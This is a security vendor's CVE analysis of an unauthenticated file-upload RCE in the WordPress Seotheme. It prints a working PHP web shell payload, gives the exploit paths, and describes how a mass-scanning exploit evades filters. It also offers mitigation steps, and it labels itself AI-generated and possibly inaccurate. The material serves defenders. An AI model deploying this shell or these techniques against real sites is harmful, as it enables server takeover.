ZeroPath at Black Hat USA 2026

WordPress Seotheme CVE-2023-54352: Overview of a Critical Unauthenticated Remote Code Execution Vulnerability

A brief summary of CVE-2023-54352, a critical unauthenticated remote code execution flaw in the WordPress Seotheme that allows arbitrary PHP file uploads and persistent backdoor access with no authentication required.

CVE Analysis

10 min read

ZeroPath CVE Analysis
ZeroPath CVE Analysis

2026-06-07

WordPress Seotheme CVE-2023-54352: Overview of a Critical Unauthenticated Remote Code Execution Vulnerability
Experimental AI-Generated Content

This CVE analysis is an experimental publication that is completely AI-generated. The content may contain errors or inaccuracies and is subject to change as more information becomes available. We are continuously refining our process.

If you have feedback, questions, or notice any errors, please reach out to us.

[email protected]

Introduction

A WordPress theme with no identifiable vendor, no official repository listing, and no security contact has been shipping an unauthenticated file upload endpoint that grants any remote attacker full PHP code execution on the underlying server. CVE-2023-54352 affects the WordPress Seotheme and carries a CVSS v3 score of 9.8, with a weaponized mass scanning tool publicly available on Exploit-DB since September 2023, more than two years before the vulnerability received its formal CVE assignment in June 2026.

The Seotheme is a WordPress theme that does not appear in the official WordPress.org theme directory, suggesting distribution through third-party channels or direct download. Its exact install base is unknown, but WordPress.org support threads confirm that automated scanners are actively probing for Seotheme related paths across the internet, indicating the theme has meaningful real world deployment. The vulnerability also extends to the Travelscape WordPress theme (version 1.0.3 and earlier), which shares the same vulnerable code pattern.

Technical Information

Root Cause: Missing Authentication for Critical Function

CVE-2023-54352 is classified under CWE-306 (Missing Authentication for Critical Function). The Seotheme theme exposes a file upload capability within its directory structure that performs absolutely no authentication or authorization checks before allowing file operations. This means any unauthenticated remote attacker can upload arbitrary PHP files to the theme directory, where the web server will execute them on request.

The CVSS v4 vector string confirms the severity profile:

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

This translates to: network accessible, low attack complexity, no privileges required, no user interaction needed, and high impact across confidentiality, integrity, and availability. VulnCheck acted as the CVE Numbering Authority (CNA) for this vulnerability.

MetricValue
CVE IDCVE-2023-54352
CVSS v3 Score9.8 (Critical)
CVSS v4 Score9.3 (Critical)
CWECWE-306 (Missing Authentication for Critical Function)
CNAVulnCheck
NVD PublishedJune 7, 2026

The PHP Web Shell Payload

The exploit deploys a PHP web shell named mar.php that provides three capabilities: system identification, a file upload interface, and file persistence. The payload as published in the Exploit-DB entry (51789) is:

<?php echo "EX"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>

Breaking this down:

  1. System identification: The shell prints the string "EX" followed by the output of php_uname(), which reveals the operating system name, hostname, release version, and machine architecture. This gives the attacker immediate reconnaissance data about the compromised server.

  2. File upload interface: An HTML form with a file input field named zb allows the attacker to upload additional files through the browser.

  3. File persistence: PHP's copy() function moves uploaded files from the temporary location ($_FILES['zb']['tmp_name']) to a permanent filename ($_FILES['zb']['name']) in the current directory, confirming success with "eXploiting Done" or failure with "Failed to Upload.".

This design enables both immediate command execution and persistent backdoor access through secondary file uploads. An attacker who gains initial access through mar.php can upload additional, more sophisticated shells or tools.

Dual Attack Surface

The exploit targets two distinct paths on vulnerable WordPress installations:

  • /wp-content/themes/seotheme/mar.php
  • /wp-content/plugins/seoplugins/mar.php

This dual targeting expands the attack surface beyond the theme itself into an associated plugin called "seoplugins." Defenders must audit both directories for indicators of compromise.

Attack Flow

Based on the public exploit code and advisory details, the exploitation flow proceeds as follows:

  1. Initial access: The attacker exploits the unauthenticated file upload endpoint in the Seotheme to upload the mar.php web shell to the theme directory.

  2. Shell verification: The attacker sends a GET request to the uploaded shell path. The public scanner checks for the presence of the indicator string //0x5a455553.github.io/MARIJUANA/icon.png, which is associated with a known web shell template.

  3. System reconnaissance: Upon accessing mar.php, the attacker receives the server's OS information via php_uname().

  4. Payload deployment: Using the file upload form in mar.php, the attacker uploads additional PHP files for persistent access, privilege escalation tools, or lateral movement scripts.

  5. Persistent access: The uploaded secondary payloads provide ongoing access even if the original mar.php file is discovered and removed.

Mass Scanning Capability

The public exploit (Exploit-DB 51789) is a Python 2 scanner authored by researcher Milad Karimi (Ex3ptionaL). It is designed for mass scanning with the following characteristics:

  • Reads target domains from a text file
  • Uses multiprocessing.dummy.Pool with 100 concurrent threads
  • Sends GET requests first over HTTP, then over HTTPS with certificate verification disabled
  • Uses a mobile User-Agent string (Android 7.0; SM-G892A) and a Referer header set to www.google.com to evade basic security filters
  • Searches for the indicator string to identify already compromised sites

The scanner has been reproduced on security forums including the KSec Community, further broadening its availability.

The VulnCheck advisory for CVE-2023-54352 explicitly lists the Travelscape WordPress theme version 1.0.3 and earlier as an affected product. A separate Exploit-DB entry (51969) documents an arbitrary file upload vulnerability in Travelscape v1.0.3, also authored by Milad Karimi. The relationship between Seotheme and Travelscape, whether they share a common developer or codebase, is not documented in available sources, but the shared vulnerability pattern suggests code reuse.

Affected Systems and Versions

Based on the VulnCheck advisory and Exploit-DB entries, the following are confirmed affected:

  • WordPress Seotheme: All known versions (no specific version range documented; no patched version exists)
  • WordPress Travelscape theme: Version 1.0.3 and earlier
  • WordPress Seoplugins plugin: All known versions (targeted by the exploit at /wp-content/plugins/seoplugins/mar.php)

The Seotheme is not listed in the official WordPress.org theme directory, indicating distribution through third-party channels. Any WordPress installation with the Seotheme theme or Seoplugins plugin installed and accessible from the network should be considered vulnerable.

Threat Landscape Context

No confirmed evidence of active in-the-wild exploitation of CVE-2023-54352 was found in available sources, and the CVE does not appear in the CISA Known Exploited Vulnerabilities (KEV) catalog as of June 8, 2026. However, several factors elevate the threat profile significantly.

The weaponized exploit has been publicly available since September 2023, published to Exploit-DB on February 9, 2024. This means the attack technique has been accessible to threat actors for over two years before the vulnerability received formal CVE tracking. During this window, exploitation would not have been captured by CVE-based monitoring systems.

The broader WordPress theme exploitation landscape provides important context. In July 2025, the WordPress "Alone" theme RCE vulnerability (CVE-2025-5394) saw over 120,000 blocked exploitation attempts, demonstrating the scale at which attackers target this vulnerability class. The Reddit WordPress community confirms that automated bots constantly scan the internet for WordPress sites to upload PHP backdoors, meaning any publicly known file upload vulnerability is likely to be exploited opportunistically.

IndicatorStatus
Public exploit codeAvailable (Exploit-DB 51789, 51969)
CISA KEV listedNot listed
Confirmed in the wild exploitationNot confirmed
Known threat actorsNot identified
Mass scanning tool availableYes (Python scanner with 100 threads)
Time exploit has been publicOver 2 years (since September 2023)

The combination of a publicly available mass scanning exploit, a vulnerability class that is routinely targeted by automated botnets, and the complete absence of a vendor patch creates a risk profile where exposed installations should be assumed targeted.

Mitigation Strategies

No official vendor patch exists for the Seotheme, and no vendor security contact could be identified. The VulnCheck advisory does not provide explicit mitigation guidance. Based on the available technical details, we recommend the following actions:

Immediate removal: Remove the Seotheme theme and Seoplugins plugin entirely from the WordPress installation. If the theme is in active use, migrate to a maintained alternative before removal.

Indicator of compromise audit: Check for the presence of mar.php or any unexpected PHP files in these directories:

  • /wp-content/themes/seotheme/
  • /wp-content/plugins/seoplugins/

Search the entire web root for files containing the indicator string //0x5a455553.github.io/MARIJUANA/icon.png or the output signature "EX" followed by php_uname() output. Simple removal of the shell file may be insufficient if attackers have uploaded secondary payloads through the file upload form.

Travelscape remediation: Sites running the Travelscape theme should update to a version later than 1.0.3.

PHP execution restrictions: Configure the web server to prevent PHP execution in theme and plugin upload directories. For Apache, an .htaccess rule denying PHP execution in /wp-content/themes/ and /wp-content/plugins/ subdirectories provides defense in depth.

WAF deployment: A web application firewall can block requests to known exploit paths such as /wp-content/themes/seotheme/mar.php and intercept file upload requests targeting unauthenticated endpoints.

Ongoing monitoring: Monitor wp-content directories for anomalous file creation. Given the persistent backdoor capability of the exploit, continuous file integrity monitoring is essential for detecting secondary payloads.

References

Detect & fix
what others miss

Works with
  • GitHub
  • GitLab
  • Bitbucket
  • Azure DevOps Services
  • Jira
  • Linear
  • Slack
  • Security Compass
Security magnifying glass visualization